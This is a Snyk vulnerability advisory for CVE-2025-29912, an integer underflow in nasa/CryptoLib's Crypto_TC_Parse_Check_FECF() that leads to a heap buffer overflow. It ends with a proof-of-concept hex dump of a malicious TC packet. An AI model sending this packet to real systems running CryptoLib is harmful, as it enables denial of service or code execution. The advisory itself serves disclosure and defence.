Integer Underflow (Wrap or Wraparound) Affecting nasa/CryptoLib package, versions [0,]
Threat Intelligence
Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk IDSNYK-UNMANAGED-NASACRYPTOLIB-9486552
- published20 Mar 2025
- disclosed18 Mar 2025
- creditMirko Bitetto
Introduced: 18 Mar 2025
CVE-2025-29912 (opens in a new tab)How to fix?
A fix was pushed into the master branch but not yet published.
Overview
Affected versions of this package are vulnerable to Integer Underflow (Wrap or Wraparound) in the Crypto_TC_Parse_Check_FECF() function that could lead to a heap-based buffer overflow. An attacker can cause a denial of service or potentially execute arbitrary code by sending a malicious TC packet with a frame length (fl) value of 0, which underflows to 65535.
PoC
08 03 00 00 7F 0B 00 0A FD 02 02 02 02 7F FF 02 02 02 02 02 02 02 02 02
02 02 02 02 02 9B DD 5F 3C 98 DD 1C 50 D2 7A 43 0A 4B 67 57 AA 33 EC 18
39 52 A9 F7 6E 50 4E B5 F8 00 10 66 ED 6C 00 C8 78 8E 11 99 7F 2A 05 8D
A1 63 3E 11 FE D9 85 1D 45 7B B3 1A 96 37 EC 8F 4F 15 BC 85 75 A0 E7 10
4D BA 5C 66 6B 17 F7 CC CD C2 AD BF F9